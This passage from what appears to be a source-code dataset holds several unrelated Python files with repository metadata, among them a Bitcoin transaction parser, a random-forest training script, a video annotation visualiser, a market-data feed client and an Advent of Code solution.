self._debug['len_sig']['end'] = self._io.pos()
self._debug['sep_1']['start'] = self._io.pos()
self.sep_1 = self._io.read_bytes(1)
self._debug['sep_1']['end'] = self._io.pos()
if not self.sep_1 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_1, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/2")
self._debug['len_sig_r']['start'] = self._io.pos()
self.len_sig_r = self._io.read_u1()
self._debug['len_sig_r']['end'] = self._io.pos()
self._debug['sig_r']['start'] = self._io.pos()
self.sig_r = self._io.read_bytes(self.len_sig_r)
self._debug['sig_r']['end'] = self._io.pos()
self._debug['sep_2']['start'] = self._io.pos()
self.sep_2 = self._io.read_bytes(1)
self._debug['sep_2']['end'] = self._io.pos()
if not self.sep_2 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_2, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/5")
self._debug['len_sig_s']['start'] = self._io.pos()
self.len_sig_s = self._io.read_u1()
self._debug['len_sig_s']['end'] = self._io.pos()
self._debug['sig_s']['start'] = self._io.pos()
self.sig_s = self._io.read_bytes(self.len_sig_s)
self._debug['sig_s']['end'] = self._io.pos()
class PublicKey(KaitaiStruct):
SEQ_FIELDS = ["type", "x", "y"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['type']['start'] = self._io.pos()
self.type = self._io.read_u1()
self._debug['type']['end'] = self._io.pos()
self._debug['x']['start'] = self._io.pos()
self.x = self._io.read_bytes(32)
self._debug['x']['end'] = self._io.pos()
self._debug['y']['start'] = self._io.pos()
self.y = self._io.read_bytes(32)
self._debug['y']['end'] = self._io.pos()
class Vout(KaitaiStruct):
SEQ_FIELDS = ["amount", "len_script", "script_pub_key"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['amount']['start'] = self._io.pos()
self.amount = self._io.read_u8le()
self._debug['amount']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_pub_key']['start'] = self._io.pos()
self.script_pub_key = self._io.read_bytes(self.len_script)
self._debug['script_pub_key']['end'] = self._io.pos()
| 0
| 0
| 0
| 10,206
| 0
| 0
| 0
| 36
| 89
|
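A minimal usage sketch for the generated debug-mode parser above, assuming the module is importable as bitcoin_transaction, that kaitaistruct is installed, and that a hex-encoded legacy (pre-SegWit) transaction is passed as the first command-line argument; the script wrapper and argument handling here are illustrative and not part of the original file.

# Illustrative only -- driving the debug-mode parser shown above.
import sys

from kaitaistruct import KaitaiStream, BytesIO

from bitcoin_transaction import BitcoinTransaction

raw = bytes.fromhex(sys.argv[1])      # serialized transaction, hex-encoded (assumed input)
tx = BitcoinTransaction(KaitaiStream(BytesIO(raw)))
tx._read()                            # debug-mode classes require an explicit _read() call

print("version:", tx.version, "locktime:", tx.locktime)
for i, vin in enumerate(tx.vins):
    print("vin", i, "txid:", vin.txid[::-1].hex(), "output index:", vin.output_id)
for i, vout in enumerate(tx.vouts):
    print("vout", i, "amount (satoshi):", vout.amount)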
3a917aec646616b14d05103f2a853a51a6359d7f
| 459
|
py
|
Python
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 772
|
2015-01-17T09:11:07.000Z
|
2022-03-23T08:50:31.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 50
|
2015-03-12T14:33:51.000Z
|
2022-03-10T07:58:54.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 110
|
2015-01-30T07:27:23.000Z
|
2021-12-15T07:22:20.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <[email protected]>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
| 30.6
| 71
| 0.736383
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <[email protected]>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
from gitup import config
def test_empty_list(tmpdir, capsys):
config_path = tmpdir / "config"
config.list_bookmarks(config_path)
captured = capsys.readouterr()
assert captured.out == "You have no bookmarks to display.\n"
| 0
| 0
| 0
| 0
| 0
| 190
| 0
| 3
| 46
|
8d619e7f57b45654b3e4b1e082e471adaafd8081
| 596
|
py
|
Python
|
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 19.225806
| 54
| 0.510067
|
from cg import *
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| -5
| 22
|
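The generated program above multiplies two 20x20 matrices of random integers in [0, 100]. As a point of comparison only (not part of the original file), the same arithmetic in plain NumPy looks like this:

# Illustrative only -- NumPy equivalent of the generated matrix product.
import numpy as np

rng = np.random.default_rng(0)
n, m = 20, 100
a = rng.integers(0, m + 1, size=(n, n))   # randint(0, m) in the original includes m
b = rng.integers(0, m + 1, size=(n, n))

c = a @ b                                 # same triple-loop sum of products
print(c)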
d00adb83565673cb264520ebee0b3eda48e2f0c5
| 2,523
|
py
|
Python
|
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
import os.path
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
mape = metrics.mean_absolute_percentage_error(predictions, y_test)
mse = metrics.mean_squared_error(predictions, y_test)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 37.656716
| 100
| 0.738407
|
import os.path
from typing import Dict
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model, save_model
from weighted_mean_prediction.regression_performance import plot_rf_feature_importances
def is_same_params(study_params: Dict[str, object],
model_params: Dict[str, object]) -> bool:
return all([study_params[p] == model_params[p] for p in study_params.keys()])
def train_tuned_model(model_params: Dict[str, object], X_train: pd.DataFrame, y_train: pd.DataFrame,
file_path: str) -> RandomForestRegressor:
model = RandomForestRegressor(**model_params, random_state=0)
model.fit(X_train, y_train)
save_model(model, file_path)
return model
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
mape = metrics.mean_absolute_percentage_error(predictions, y_test)
mse = metrics.mean_squared_error(predictions, y_test)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 0
| 0
| 0
| 0
| 0
| 464
| 0
| 80
| 90
|
0278f07d5c4fcf43dea6388a703c9cfa378a80f3
| 4,464
|
py
|
Python
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
weijiawu/BOVText-Benchmark
|
375cc1c72e20fb751e17a33c74fc4ca5c1557389
|
[
"CC-BY-4.0"
] | 24
|
2021-10-12T04:02:31.000Z
|
2022-03-31T07:19:17.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 1
|
2021-10-12T04:06:14.000Z
|
2021-10-12T04:06:14.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 5
|
2021-11-29T05:18:36.000Z
|
2022-02-27T02:22:47.000Z
|
# -*- coding: utf-8 -*-
import cv2
import os
import numpy as np
# import Levenshtein
from cv2 import VideoWriter_fourcc
from tqdm import tqdm
import shutil
def Frames2Video(frames_dir=""):
    ''' Combine all video frames under frames_dir into a single video '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 35.428571
| 144
| 0.600582
|
# -*- coding: utf-8 -*-
import cv2
import os
import copy
import numpy as np
import math
# import Levenshtein
from cv2 import VideoWriter, VideoWriter_fourcc
import json
from tqdm import tqdm
from PIL import Image, ImageDraw, ImageFont
import shutil
def Frames2Video(frames_dir=""):
    ''' Combine all video frames under frames_dir into a single video '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
    fourcc = VideoWriter_fourcc(*"MJPG") # supports jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
def get_annotation(video_path):
annotation = {}
with open(video_path,'r',encoding='utf-8-sig') as load_f:
gt = json.load(load_f)
for child in gt:
lines = gt[child]
annotation.update({child:lines})
return annotation
def cv2AddChineseText(img, text, position, textColor=(0, 255, 0), textSize=30):
    if (isinstance(img, np.ndarray)):  # check whether this is an OpenCV image (numpy array)
img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    # create a drawing object for the given image
draw = ImageDraw.Draw(img)
    # font settings
fontStyle = ImageFont.truetype(
"./simsun.ttc", textSize, encoding="utf-8")
    # draw the text
draw.text(position, text, textColor, font=fontStyle)
    # convert back to OpenCV format
return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 168
| 0
| 0
| 0
| 0
| 686
| 0
| 5
| 138
|
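The cv2AddChineseText helper above works around OpenCV's lack of CJK glyph rendering by converting the frame to a Pillow image, drawing the text with a TrueType font, and converting back. A stripped-down sketch of that round trip follows, with the font path made an explicit parameter; the font file name and the demo frame are assumptions, not taken from the original script.

# Illustrative only -- the OpenCV -> Pillow -> OpenCV round trip used above.
import cv2
import numpy as np
from PIL import Image, ImageDraw, ImageFont

def draw_text(frame_bgr, text, xy, font_path="simsun.ttc", size=30, color=(0, 255, 0)):
    # OpenCV frames are BGR numpy arrays; Pillow expects RGB
    img = Image.fromarray(cv2.cvtColor(frame_bgr, cv2.COLOR_BGR2RGB))
    draw = ImageDraw.Draw(img)
    font = ImageFont.truetype(font_path, size)
    draw.text(xy, text, fill=color, font=font)
    return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)

frame = np.zeros((120, 480, 3), dtype=np.uint8)       # blank demo frame
frame = draw_text(frame, "text 文本 0", (10, 40))
cv2.imwrite("annotated.jpg", frame)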
132e0421e9b24a450962f82bb4efb1ae59d84d80
| 5,814
|
py
|
Python
|
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | null | null | null |
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | 1
|
2021-10-30T05:32:06.000Z
|
2021-11-01T11:36:15.000Z
|
vnpy_tinysoft/tinysoft_datafeed.py
|
vnpy/vnpy_tinysoft
|
0d97a91251c02f1b2a7e4afd707a2157056605c6
|
[
"MIT"
] | null | null | null |
from datetime import timedelta
from typing import Dict
from pytz import timezone
from vnpy.trader.constant import Exchange, Interval
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
| 31.945055
| 133
| 0.491916
|
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from pytz import timezone
from vnpy.trader.setting import SETTINGS
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, TickData, HistoryRequest
from vnpy.trader.utility import extract_vt_symbol
from vnpy.trader.datafeed import BaseDatafeed
from .pyTSL import Client, DoubleToDatetime
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
class TinysoftDatafeed(BaseDatafeed):
"""天软数据服务接口"""
def __init__(self):
""""""
self.username: str = SETTINGS["datafeed.username"]
self.password: str = SETTINGS["datafeed.password"]
self.client: Client = None
self.inited: bool = False
def init(self) -> bool:
"""初始化"""
if self.inited:
return True
self.client = Client(
self.username,
self.password,
"tsl.tinysoft.com.cn",
443
)
n: int = self.client.login()
if n != 1:
return False
self.inited = True
return True
def query_bar_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""查询K线数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
tsl_interval: str = INTERVAL_MAP[req.interval]
bars: List[BarData] = []
start_str: str = req.start.strftime("%Y%m%d")
end_str: str = req.end.strftime("%Y%m%d")
cmd: str = (
f"setsysparam(pn_cycle(),{tsl_interval}());"
"return select * from markettable "
f"datekey {start_str}T to {end_str}T "
f"of '{tsl_exchange}{symbol}' end;"
)
result = self.client.exec(cmd)
if not result.error():
data = result.value()
shift: timedelta = SHIFT_MAP.get(req.interval, None)
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
if shift:
dt -= shift
bar: BarData = BarData(
symbol=symbol,
exchange=exchange,
datetime=CHINA_TZ.localize(dt),
interval=req.interval,
open_price=d["open"],
high_price=d["high"],
low_price=d["low"],
close_price=d["close"],
volume=d["vol"],
turnover=d["amount"],
gateway_name="TSL"
)
                # for futures, also fetch the open interest field
if not tsl_exchange:
bar.open_interest = d["sectional_cjbs"]
bars.append(bar)
return bars
def query_tick_history(self, req: HistoryRequest) -> Optional[List[TickData]]:
"""查询Tick数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
ticks: List[TickData] = []
dt: datetime = req.start
while dt <= req.end:
date_str: str = dt.strftime("%Y%m%d")
cmd: str = f"return select * from tradetable datekey {date_str}T to {date_str}T+16/24 of '{tsl_exchange}{symbol}' end ; "
result = self.client.exec(cmd)
if not result.error():
data = result.value()
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
dt: datetime = CHINA_TZ.localize(dt)
tick: TickData = TickData(
symbol=symbol,
exchange=exchange,
name=d["StockName"],
datetime=dt,
open_price=d["sectional_open"],
high_price=d["sectional_high"],
low_price=d["sectional_low"],
last_price=d["price"],
volume=d["sectional_vol"],
turnover=d["sectional_amount"],
bid_price_1=d["buy1"],
bid_price_2=d["buy2"],
bid_price_3=d["buy3"],
bid_price_4=d["buy4"],
bid_price_5=d["buy5"],
ask_price_1=d["sale1"],
ask_price_2=d["sale2"],
ask_price_3=d["sale3"],
ask_price_4=d["sale4"],
ask_price_5=d["sale5"],
bid_volume_1=d["bc1"],
bid_volume_2=d["bc2"],
bid_volume_3=d["bc3"],
bid_volume_4=d["bc4"],
bid_volume_5=d["bc5"],
ask_volume_1=d["sc1"],
ask_volume_2=d["sc2"],
ask_volume_3=d["sc3"],
ask_volume_4=d["sc4"],
ask_volume_5=d["sc5"],
localtime=dt,
gateway_name="TSL"
)
                    # for futures, also fetch the open interest field
if not tsl_exchange:
tick.open_interest = d["sectional_cjbs"]
ticks.append(tick)
dt += timedelta(days=1)
return ticks
| 120
| 0
| 0
| 4,959
| 0
| 0
| 0
| 162
| 135
|
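A sketch of how the datafeed above might be exercised, assuming vnpy and this package are installed, that TinySoft credentials are configured under datafeed.username / datafeed.password in vnpy's SETTINGS, and that HistoryRequest accepts the symbol / exchange / interval / start / end fields implied by the imports above; the symbol and date range below are placeholders.

# Illustrative only -- querying daily bars through TinysoftDatafeed.
from datetime import datetime

from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import HistoryRequest

from vnpy_tinysoft.tinysoft_datafeed import TinysoftDatafeed

datafeed = TinysoftDatafeed()
req = HistoryRequest(
    symbol="600036",                 # placeholder symbol
    exchange=Exchange.SSE,
    interval=Interval.DAILY,
    start=datetime(2021, 1, 1),
    end=datetime(2021, 6, 30),
)
bars = datafeed.query_bar_history(req)   # init() is called lazily inside the datafeed
if bars:
    print(len(bars), "bars; last close:", bars[-1].close_price)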
e2d1dcb2354936fd158943bcf5fefb6597f1fd28
| 1,203
|
py
|
Python
|
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 23.134615
| 78
| 0.47714
|
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
def rect(x,y):
global arr
for i in range(x):
for j in range(y):
print(i,j)
arr[j][i] = 1
def rotatecol(x,n):
global arr
for _ in range(n):
first = arr[5][x]
for i in range(5,0,-1):
arr[i][x] = arr[i-1][x]
arr[0][x] = first
print(arr)
def rotaterow(y,n):
global arr
for _ in range(n):
first = arr[y][49]
for i in range(49,0,-1):
arr[y][i] = arr[y][i-1]
arr[y][0] = first
print(arr)
def countpixels():
c = 0
for i in range(50):
for j in range(6):
if arr[j][i] == 1:
c += 1
return c
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 0
| 0
| 0
| 0
| 0
| 584
| 0
| 0
| 92
|
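The screen-manipulation script above implements rect, rotate-row, and rotate-column by shifting elements one position at a time. A compact alternative sketch of the same operations using collections.deque (not part of the original solution):

# Illustrative only -- the same screen operations expressed with deque.rotate().
from collections import deque

W, H = 50, 6
screen = [[0] * W for _ in range(H)]

def rect(w, h):
    for y in range(h):
        for x in range(w):
            screen[y][x] = 1

def rotate_row(y, n):
    row = deque(screen[y])
    row.rotate(n)                      # shift right by n, wrapping around
    screen[y] = list(row)

def rotate_col(x, n):
    col = deque(screen[y][x] for y in range(H))
    col.rotate(n)                      # shift down by n, wrapping around
    for y in range(H):
        screen[y][x] = col[y]

rect(3, 2)
rotate_col(1, 1)
rotate_row(0, 4)
print(sum(map(sum, screen)))           # number of lit pixels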
3d85f4be772c1a036395de1aa5c734416e429682
| 11,772
|
py
|
Python
|
core/tenhou/log.py
|
SakuraSa/TenhouLoggerX
|
7d6bcfb7e22d631673c61321f3af1c05ec011db5
|
[
"MIT"
] | 2
|
2016-09-19T16:33:29.000Z
|
2017-12-09T01:02:39.000Z
|
core/tenhou/log.py
|
SakuraSa/TenhouLoggerX
|
7d6bcfb7e22d631673c61321f3af1c05ec011db5
|
[
"MIT"
] | null | null | null |
core/tenhou/log.py
|
SakuraSa/TenhouLoggerX
|
7d6bcfb7e22d631673c61321f3af1c05ec011db5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
"""
core.tenhou.log
"""
__author__ = 'Rnd495'
import os
import json
import datetime
import urllib
from core.configs import Configs
configs = Configs.instance()
def get_results(ref_list, player_name):
"""
do statistics on given refs for given player
result dict format (example value is avg value on data set 2015/05/15) :
{
fulu_chong : 0.3940,
dama : 0.1165,
win_time : 11.50,
chong : 0.1347,
win : 0.2484,
win_point : 6690,
ends_listening : 0.5170,
